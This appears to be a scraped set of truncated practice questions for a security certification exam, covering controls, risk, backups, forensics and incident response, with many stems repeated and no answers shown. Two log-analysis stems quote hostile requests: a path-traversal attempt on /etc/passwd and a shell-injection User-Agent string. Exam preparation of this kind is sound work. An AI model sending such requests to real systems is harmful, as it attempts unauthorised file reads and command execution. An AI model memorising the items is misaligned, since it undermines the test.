- The management team reports that employees are missing features on company-provided tablets, which is causing productivity issues. The management team directs t ...
- An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...
- Which of the following activities are associated with vulnerability management?
- Multiple users in an organization sign up to use an enterprise collaboration application to increase productivity. The application is easier to use than the one ...
- An organization decides that most employees will work remotely. The existing VPN solution does not have adequate bandwidth, and the content filtering proxy is o ...
- Which of the following is the most closely associated with confidentiality?
- A company is experiencing issues with employees leaving the company for a competitor and taking customer contact information with them. Which of the following t ...
- A security administrator receives multiple reports about the same suspicious email. Which of the following is the most likely reason for the malicious email's c ...
- Which of the following data recovery strategies will result in a quick recovery at low cost?
- Which of the following technologies can achieve microsegmentation?
- A security analyst is working with the IT group to define appropriate procedures for the destruction of media and assets in the enterprise environment. Which of ...
- An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...
- Which of the following security controls would best guard a payroll system against insider manipulation threats?
- A user tries to log in to a bank website using the address www.userbahk.com, which installs malware on the user's computer. However, when the user tries to log ...
- A security team wants to work with the same organization’s development team to ensure WAF policies are automatically created when applications are deployed. Whi ...
- Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?
- Which of the following is a component of a risk register?
- A security officer observes that a software development team is not complying with its corporate security policy on encrypting confidential data. Which of the f ...
- A security team receives reports about high latency and complete network unavailability throughout most of the office building. Flow logs from the campus switch ...
- Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?
- A company wants to update its disaster recovery plan to include a dedicated location for immediate continued operations if a catastrophic event occurs. Which of ...
- Which of the following tasks is typically included in the BIA process?
- Which of the following tasks is typically included in the BIA process?
- Which of the following tasks is typically included in the BIA process?
- Which of the following describes effective change management procedures?
- A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data ...
- Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?
- Which of the following makes IaC a preferred security architecture over traditional infrastructure models?
- Which of the following is an example of a certificate that is generated by an internal source?
- A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...
- Which of the following techniques would identify whether data has been modified in transit?
- Which of the following is the greatest advantage that network segmentation provides?
- Which of the following can be used to mitigate attacks from high-risk regions?
- Which of the following would help reduce the impact of a zero-day vulnerability in NAS installed on a large office network?
- Which of the following would an organization most likely use to minimize the loss of data on a file server in the event that data needs to be restored due to lo ...
- A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...
- During the investigation of a webmail log-in using compromised credentials, a security analyst needs to review information about the source IP for the log-in. W ...
- An organization purchases software from an overseas company. The organization’s IDS solution detects that advertising data from the software is unexpectedly rep ...
- An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take? (Select two.)
- A security analyst is working with an IT group to define appropriate procedures for the destruction of media and assets in the enterprise environment. Which of ...
- A contractor is required to visually inspect the motherboards of all new servers that are purchased to determine whether the servers were tampered with. Which o ...
- When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...
- Which of the following attacks uses a website to collectively target a group of developers within an organization?
- Employees sign an agreement that restricts specific activities when leaving the company. Violating the agreement can result in legal consequences. Which of the ...
- After completing onboarding at a company and reviewing the company’s handbooks and AUP, an employee downloads an unapproved application on a company desktop. Wh ...
- A penetration tester visits a client’s website and downloads the site’s content. Which of the following actions is the penetration tester performing?
- During the onboarding process, an employee needs to create a password for an intranet account... Which of the following access management concepts is the compan ...
- A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following ...
- An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...
- Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?
- A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...
- Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?
- A new employee accessed an unauthorized website. An investigation found that the employee violated the company’s rules. Which of the following did the employee ...
- Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?
- Which of the following cryptographic solutions best protects the confidentiality and integrity of data?
- A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...
- A penetration test identifies that SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...
- Which of the following describes the understanding between a company and a client about what will be provided and the accepted time needed to provide the compan ...
- Which of the following control types describes an alert from a SIEM tool?
- A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if there ...
- A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...
- A security patch is applied to a server. Which of the following will validate this remediation?
- A company uses a cloud-based platform for file storage and wants to ensure the security of its data in transit. Which of the following should the company verify ...
- An employee from the accounting department logs in to the website used for processing the company's payments. After logging in, a new desktop application automa ...
- Which of the following should a security analyst use to prioritize the remediation of a vulnerability?
- A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?
- Which of the following threat actors would most likely deface the website of a high-profile music group?
- A customer changes the underlying file structure of a new mobile phone to install a keylogger with administrator permissions. Which of the following does this b ...
- Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?
- While browsing a web page, a user receives a pop-up with a link telling them to navigate to another site. To which of the following is the site vulnerable?
- Which of the following is the best safeguard to protect against an extended power failure?
- The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...
- Which of the following is a benefit of vendor diversity?
- A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...
- Which of the following best describe the benefits of a microservices architecture when compared to a monolithic architecture? (Select two.)
- An unexpected and out-of-character email message from a Chief Executive Officer’s corporate account asked an employee to provide financial information and to ch ...
- Which of the following is a component of a risk register?
- Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?
- For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?
- While investigating logs, a security analyst finds that usernames, passwords, and IP addresses are being sent to a command-and-control server. Which of the foll ...
- An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavio ...
- A security administrator must use a strategy to protect the company’s data. The security administrator decides to deploy FDE on the end user devices and TLS for ...
- A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...
- An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...
- Which of the following activities are associated with vulnerability management?
- A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful websites ...
- After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...
- An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...
- An employee decides to take malicious action against an organization after being passed over for a promotion. Which of the following threats does the employee n ...
- A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...
- Which of the following metrics impacts the backup schedule as part of the BIA?
- Which of the following activities should a systems administrator perform to quarantine a potentially infected system?
- An employee decides to collect PII data from the company's system for personal use. The employee compresses the data into a single encrypted file before sending ...
- Which of the following receives logs from various devices and services, and then presents alerts?
- An administrator is concerned about the amount of traffic during an upcoming event and must ensure that the site maintains consistent response times. Which of t ...
- Which of the following exercises should an organization use to improve its incident response process?
- Which of the following activities would involve members of the incident response team and other stakeholders simulating an event?
- A service provider wants a cost-effective way to rapidly expand from providing internet links to managing them. Which of the following methods will allow the se ...
- An administrator is estimating the cost associated with an attack that could result in the replacement of a physical server. Which of the following processes is ...
- A security team must ensure that only TCP port 445 is accessible from a specific VLAN. Which of the following will accomplish this goal?
- A company is working with a vendor to perform a penetration test. Which of the following includes an estimate about the number of hours required to complete the ...
- A company decides to purchase an insurance policy. Which of the following risk management strategies is this company implementing?
- At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissan ...
- A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...
- After completing an annual external penetration test, a company receives the following guidance: • Decommission two unused web servers currently exposed to the ...
- A customer reports that software the customer downloaded from a public website has malware in it. However, the company that created the software denies any malw ...
- An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?
- Which of the following attacks primarily targets insecure networks?
- During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...
- An organization wants to prevent software developers from updating production systems without prior approval. Which of the following procedures must the organiz ...
- An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to re ...
- An organization is adopting cloud services at a rapid pace and now has multiple SaaS applications in use. Each application has a separate login, so the security ...
- Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...
- Which of the following would be the most appropriate way to protect data in transit?
- An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track a ...
- Which of the following will harden access to a new database system? (Select two)
- A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...
- Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...
- Which of the following technologies can achieve microsegmentation?
- A large multinational corporation experienced a security breach. After the breach, the Chief Information Security Officer explains to the senior management team ...
- An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to re ...
- A security analyst developed a script to automate a trivial and repeatable task. Which of the following best describes the benefits of ensuring that other team ...
- Which of the following is the most likely motivation for a hacktivist?
- Which of the following cryptographic solutions would allow an organization to recover encrypted data after a key becomes corrupted or is deleted?
- A few weeks after deploying additional email servers, a company begins to receive complaints from employees that messages they send are going into their recipie ...
- Which of the following is a company addressing when it rolls out MDM on all COPE devices?
- A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data ...
- A security team purchases a tool for cloud security posture management. The team is quickly overwhelmed by the number of misconfigurations that the tool detects ...
- Which of the following cryptographic solutions best protects the confidentiality and integrity of data?
- A company is changing its mobile device policy. The company has the following requirements: • Company-owned devices • Ability to harden the devices • Reduced sec ...
- The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on ...
- Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?
- An administrator must secure several end-of-life SCADA devices in a manufacturing facility on a limited budget. Which of the following should the security admin ...
- Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?
- A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...
- A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...
- A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA ...
- A security analyst sees an increase of vulnerabilities on workstations after a deployment of a company group policy. Which of the following vulnerability types ...
- Which of the following allows for the attribution of messages to individuals?
- A government agency requires publicly traded organizations to report cyber breaches within a designated time period. By law, these reports are made public. Whic ...
- An attacker gained access to a virtual machine and was able to access the hypervisor. Which of the following describes this attack?
- A network team is investigating failures to onboard users to a Wi-Fi network. The investigation shows that the access point accepts connections for a short time ...
- An employee decides to take malicious action against an organization after being passed over for a promotion. Which of the following threats does the employee n ...
- An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavio ...
- Which of the following is the best security reason for closing service ports that are not needed?
- An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...
- A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...
- Which of the following can assist in recovering data if the decryption key is lost?
- A user sits in a coffee shop on a government-issued laptop. A stranger starts a conversation with the user and starts asking about where the user works, what di ...
- Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?
- Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?
- Which of the following security controls is a company implementing by deploying HIPS?
- A business manager is concerned about the availability of an application running on hardware in the local data center. Which of the following solutions will imp ...
- Which of the following is the best physical security control to prevent damage from a vehicle?
- Which of the following describes an agent-based application that detects and blocks malicious behavior on enterprise systems while disconnected from the corpora ...
- Which of the following encryption methods protects data if a user loses their laptop?
- A red-team provider tailgates into an organization's facility. Which of the following has occurred?
- Which of the following security concepts is being followed when applying encryption to sensitive data?
- A security team must ensure that only TCP port 445 is accessible from a specific VLAN. Which of the following will accomplish this goal?
- A security team wants to work with the same organization's development team to ensure WAF policies are automatically created when applications are deployed. Whi ...
- Which of the following would most likely prevent exploitation of an end-of-life, business-critical system?
- Which of the following activities is included in the post-incident review phase?
- During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...
- A user receives a malicious text message that routes to a fake bank login. Which of the following attack types does this scenario describe?
- A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifi ...
- During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, a ...
- An administrator is concerned about the amount of traffic during an upcoming event and must ensure that the site maintains consistent response times. Which of t ...
- Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...
- While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...
- After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...
- Which of the following is the most common data loss path for an air-gapped network?
- Which of the following describes effective change management procedures?
- A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...
- Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?
- Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?
- Which of the following would be the best way to test resiliency in the event of a primary power failure?
- An organization has recently decided to implement SSO. The requirements are to leverage access tokens and focus on application authorization rather than user au ...
- Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?
- Which of the following would be the most appropriate way to protect data in transit?
- An administrator learns that users are receiving large quantities of unsolicited messages. The administrator checks the content filter and sees hundreds of mess ...
- Which of the following outlines the configuration, maintenance, and security roles between a cloud service provider and the customer?
- During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...
- Which of the following strategies most effectively protects sensitive data at rest in a database?
- Which of the following risk management strategies is being used when a Chief Information Security Officer ignores known vulnerabilities identified during a risk ...
- An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...
- An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...
- Which of the following teams combines both offensive and defensive testing techniques to protect an organization’s critical systems?
- Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...
- Which of the following is a feature of a next-generation SIEM system?
- An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...
- Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?
- A company’s antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...
- A network administrator deploys an FDE solution on all end user workstations. Which of the following data protection strategies does this describe?
- While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...
- An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator's ...
- A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...
- A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...
- Which of the following will harden access to a new database system? (Select two)
- An IT manager is putting together a documented plan describing how the organization will keep operating in the event of a global incident. Which of the followin ...
- A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government. Which of the following will ...
- A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs. Which of the following security benefits do these ...
- An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track a ...
- Which of the following threat actors would most likely target an organization by using a logic bomb within an internally-developed application?
- A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the co ...
- A systems administrator is working on a solution with the following requirements: • Provide a secure zone. • Enforce a company-wide access control policy. • Red ...
- After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financia ...
- A company performs a risk assessment on the information security program each year. Which of the following best describes this risk assessment?
- Which of the following would a security analyst need to consider when prioritizing remediation efforts against known vulnerabilities?
- A store is setting up wireless access for their employees. Management wants to limit the number of access points while ensuring all areas of the store are cover ...
- Which of the following best describes why a company would erase a newly purchased device and install its own image with an operating system and applications?
- Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centrali ...
- For an upcoming product launch, a company hires a marketing agency whose owner is a close relative of the Chief Executive Officer. Which of the following did th ...
- Which of the following is the most common data loss path for an air-gapped network?
- A security analyst receives an alert from a web server that contains the following logs: GET /image?filename=../../../etc/passwd GET /image?filename=../../../ ...
- A security manager needs an automated solution that will take immediate action to protect an organization against inbound malicious traffic. Which of the follow ...
- A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifi ...
- Which of the following vulnerabilities would likely be mitigated by setting up an MDM platform?
- During a routine audit, an analyst discovers that a department at a high school uses a simulation program that was not properly vetted before deployment. Which ...
- Which of the following is a primary security concern for a company setting up a BYOD program?
- A company needs to determine whether authentication weaknesses in a customer-facing web application exist. Which of the following is the best technique to use?
- A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?
- Which of the following is a risk of conducting a vulnerability assessment?
- An enterprise is working with a third party and needs to allow access between the internal networks of both parties for a secure file migration. The solution ne ...
- An organization is evaluating the cost of licensing a new solution to prevent ransomware. Which of the following is the most helpful in making this decision?
- While troubleshooting an internal resource's poor performance for an end user, a network engineer performs a traceroute on the end device and receives the follo ...
- A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...
- A security administrator wants to improve the reliability of the firewall connection at the company’s primary data center. Which of the following should the adm ...
- A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager shou ...
- A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the ...
- A security analyst is concerned malicious actors are lurking in an environment but has not received any alerts regarding suspicious activity. Which of the follo ...
- A company phone with proprietary data used by an employee has been stolen. Which of the following can be used to remotely wipe the device?
- Which of the following is a common data removal option for companies that want to wipe sensitive data from hard drives in a repeatable manner but allow the hard ...
- Which of the following risks can be mitigated by HTTP headers?
- Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...
- A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...
- A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best faci ...
- A Chief Information Security Officer has decided that purchasing insurance when the ALE of expected incidents exceeds $1 million is the most cost-effective appr ...
- Which of the following non-production sites is an operational mirror of the primary data center and is ready for use if the primary data center experiences an o ...
- Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).
- Remote users report that they are unable to log in to the VPN. The help desk confirms that each employee has a stable internet connection and correct permission ...
- A penetration tester gained access to a server room by dressing as an engineer from a known third-party vendor. Which of the following types of penetration test ...
- A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...
- Car vandalism repeatedly occurs near a specific part of a company’s ungated facility. Which of the following would provide the best physical deterrent? (Select ...
- An organization needs to block certain information from view. Which of the following should the organization use to accomplish this task?
- After a company was compromised, customers initiated a lawsuit. The company’s attorneys have requested that the security team initiate a legal hold in response ...
- An important patch for a critical application has just been released, and a systems administrator is identifying all of the systems requiring the patch. Which o ...
- A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager shou ...
- Which of the following cryptographic solutions is used to hide the fact that communication is occurring?
- A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Whic ...
- Visitors to a company’s facilities are connecting to the company’s corporate network Wi-Fi and open network ports. Which of the following should the security en ...
- A company hired a security consultant to suggest a device that will protect its inbound HTTP traffic by immediately blocking security violations. Which of the f ...
- Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...
- Which of the following would be used to detect an employee who is emailing a customer list to a personal account before leaving the company?
- A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...
- During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...
- A company's antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...
- While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...
- An administrator investigating an incident is concerned about the downtime of a critical server due to a failed drive. Which of the following would the administ ...
- Which of the following hardening techniques must be applied on a container image before deploying it to a production environment? (Select two)
- A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the f ...
- A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...
- A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...
- Which of the following would most likely prevent exploitation of an end-of-life, business-critical system?
- Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?
- An administrator learns that users are receiving large quantities of unsolicited messages. The administrator checks the content filter and sees hundreds of mess ...
- Which of the following principles requires that a company must keep files or records for a prescribed period of time before it disposes of those files or record ...
- A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
- A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...
- Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?
- An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...
- Which of the following agreements defines response time, escalation points, and performance metrics?
- Which of the following is a vulnerability concern for end-of-life hardware?
- A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...
- Which of the following would be the best way to test resiliency in the event of a primary power failure?
- A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...
- While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...
- An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...
- A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this e ...
- Which of the following can best contribute to prioritizing patch applications?
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 20 ...
- During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...
- Which of the following would best ensure a controlled version release of a new software application?
- A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...
- Which of the following would be the most appropriate way to protect data in transit?
- A penetration tester visits a client's website and downloads the site's content. Which of the following actions is the penetration tester performing?
- Which of the following control types is AUP an example of?
- Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?
- A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...
- An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...
- Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?
- After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...
- Which of the following is a feature of a next-generation SIEM system?
- While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...
- An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?
- A vendor salesperson is a personal friend of a company’s Chief Financial Officer (CFO). The company recently made a large purchase from the vendor, which was di ...
- Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...
- Which of the following is the greatest advantage that network segmentation provides?
- Which of the following would best allow a company to prevent access to systems from the internet?
- An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...
- A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...
- Which of the following strategies most effectively protects sensitive data at rest in a database?
- A manager receives an external call from a vendor that needs the wireless network login information to fix an issue with the company’s network printer. Which of ...
- Which of the following should be used to prevent changes to system-level data?
- Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?
- Which of the following is most likely to be used as a just-in-time reference document within a security operations center?
- Which of the following is the best safeguard to protect against an extended power failure?
- A network administrator wants to ensure that network traffic is highly secure while in transit. Which of the following actions best describes the actions the ne ...
- Which of the following would best prepare a security team for a specific incident response scenario?
- A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...
- Which of the following allows for the attribution of messages to individuals?
- A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...
- A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...
- A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...
- Which of the following can assist in recovering data if the decryption key is lost?
- The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...
- The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...
- Which of the following is a benefit of launching a bug bounty program? (Select two).
- During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...
- Which of the following is a reason environmental variables are a concern when reviewing potential system vulnerabilities?
- A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...
- Which of the following is a one-way function that provides assurance of data integrity?
- A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Whi ...
- Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?
- An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...
- Which of the following metrics impacts the backup schedule as part of the BIA?
- A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?
- A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...
- After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps shou ...
- During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...
- A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?
- A user, who wants to watch a movie during a break at work, connects to a network switch using an Ethernet cable from a personal laptop. Which of the following s ...
- Which of the following would best allow a company to prevent access to systems from the internet?
- A penetration tester visits a client’s website and downloads the site’s content. Which of the following actions is the penetration tester performing?
- A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...
- A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...
- A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...
- While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...
- Which of the following is the greatest advantage that network segmentation provides?
- Which of the following would best prepare a security team for a specific incident response scenario?
- While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...
- Which of the following agreements defines response time, escalation points, and performance metrics?
- Which of the following hardening techniques must be applied on a container image before deploying it to a production environment? (Select two)
- The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...
- An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?
- Which of the following can best contribute to prioritizing patch applications?
- Which of the following is a preventive physical security control?
- Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...
- A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...
- A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...
- Which of the following would best ensure a controlled version release of a new software application?
- Which of the following is a benefit of launching a bug bounty program? (Select two).
- An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...
- Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?
- Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?
- A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...
- Which of the following control types is AUP an example of?
- Which of the following allows for the attribution of messages to individuals?
- Which of the following strategies most effectively protects sensitive data at rest in a database?
- A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...
- Which of the following is most likely to be used as a just-in-time reference document within a security operations center?
- A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...
- Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...
- An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...
- Which of the following outlines the configuration, maintenance, and security roles between a cloud service provider and the customer?
- Which of the following is a preventive physical security control?
- Which of the following metrics impacts the backup schedule as part of the BIA?
- An organization needs to block certain information from view. Which of the following should the organization use to accomplish this task?
- Which of the following would be used to detect an employee who is emailing a customer list to a personal account before leaving the company?
- Which of the following is a compensating control for providing user access to a high-risk website?
- Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...
- A company phone with proprietary data used by an employee has been stolen. Which of the following can be used to remotely wipe the device?
- Which of the following risk management strategies describes applying a compensating control to a device rather than patching?
- After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...
- Visitors to a company’s facilities are connecting to the company’s corporate network Wi-Fi and open network ports. Which of the following should the security en ...
- Car vandalism repeatedly occurs near a specific part of a company’s ungated facility. Which of the following would provide the best physical deterrent? (Select ...
